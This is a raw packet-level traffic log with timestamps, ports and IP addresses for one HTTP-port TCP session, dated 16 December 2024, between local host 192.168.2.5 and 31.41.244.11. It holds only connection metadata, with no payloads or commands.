Dec 16, 2024 11:03:30.625716925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.625773907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.626580954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.626633883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.626692057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.627552032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.627703905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.627753019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.627785921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.627830029 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.628756046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.628812075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.628869057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.628928900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.629827976 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.629875898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.629937887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.629976988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.630956888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.630995989 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.631072044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.631117105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.632030010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.632074118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.632117987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.632164955 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.633095980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.633141994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.633171082 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.633218050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.634171963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.634223938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.634282112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.634325981 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.635267973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.635317087 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.635468960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.635514021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.636377096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.636426926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.636460066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.636503935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.637415886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.637463093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.637523890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.637567997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.638508081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.638556004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.638593912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.638633013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.639583111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.639628887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.639691114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.639733076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.640659094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.640705109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.640764952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.641087055 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.641704082 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.641750097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.776892900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.776953936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.777002096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.777091026 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.777448893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.777491093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.777501106 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.777544022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.778573990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.778640032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.778671026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.778713942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.779649973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.779702902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.779764891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.779890060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.780684948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.780730009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.780740976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.780766964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.781891108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.781969070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.781979084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.782010078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.782938957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.782990932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.783026934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.783096075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.783993006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.784044027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.784065962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.784286022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.785188913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.785244942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.785260916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.785310030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.786211014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.786267042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.786322117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.787254095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.787317991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.787442923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.787508965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.788362026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.788413048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.788482904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.788533926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.789433002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.789489031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.789676905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.789726973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.790524006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.790580034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.790946960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.791001081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.791584015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.791688919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.791743994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.792730093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.792783976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.792973995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.793025017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.793782949 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.793875933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.793934107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.794835091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.794888973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.794956923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.795008898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.795913935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.796019077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.796092033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.796215057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.797003031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.797133923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.797180891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.798111916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.798171043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.798238039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.798373938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.799151897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.799226046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.799290895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.799340963 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.800261974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.800313950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.800364017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.800410032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.801336050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.801392078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.801456928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.801503897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.802587032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.802635908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.802705050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.802756071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.803567886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.803682089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.803733110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.804786921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.804836988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.804841995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.804888010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.805668116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.805716038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.806096077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.806147099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.806735039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.806863070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.806912899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.807847977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.807898045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.807909012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.807949066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.808900118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.808964968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.809075117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.809307098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.810002089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.810054064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.810575008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.810633898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.811193943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.811248064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.811305046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.811352968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.812175989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.812227964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.812519073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.812575102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.813246012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.813303947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.813909054 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.813971996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.814347982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.814516068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.814575911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.815495968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.815550089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.815627098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.815677881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.816526890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.816627026 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.816696882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.816752911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.817629099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.817682028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.817841053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.817893982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.818670034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.818722963 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.818927050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.818989992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.819766998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.819925070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.819987059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.820816994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.820890903 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.820941925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.821136951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.821899891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.821948051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.822016954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.822237968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.823091984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.823146105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.823148012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.823200941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.824115992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.824163914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.824233055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.824781895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.825339079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.825396061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.825412989 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.825439930 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.826303005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.826359987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.826494932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.826560974 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.827378988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.827433109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.827488899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.827569008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.828430891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.828521967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.828608990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.828675985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.829547882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.829601049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.829653978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.829710007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.830568075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.830626965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.830657959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.830707073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.831711054 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.831764936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.831834078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.831912994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.832791090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.832843065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.832914114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.832968950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.833830118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.833978891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.969505072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.969635010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.969644070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.969700098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.970036030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.970146894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.970192909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.971163034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.971244097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.971352100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.971551895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.972235918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.972310066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.972438097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.972820997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.973309040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.973383904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.973429918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.973814964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.974416971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.974472046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.974515915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.974562883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.975514889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.975605965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.975662947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.976552010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.976608038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.976716995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.976768970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.977659941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.977746010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.977790117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.977802992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.978745937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.978813887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.978893995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.978948116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.979809999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.979878902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.979937077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.980072975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.980887890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.980956078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.981023073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.981512070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.981980085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.982114077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.982176065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.983088017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.983139038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.983146906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.983227968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.984205961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.984241962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.984297037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.985249043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.985313892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.985362053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.985409975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.986345053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.986396074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.986459970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.986505985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.987494946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.987585068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.987642050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.988518953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.988593102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.988657951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.989510059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.989563942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.989610910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.989736080 CET	80	49833	31.41.244.11	192.168.2.5
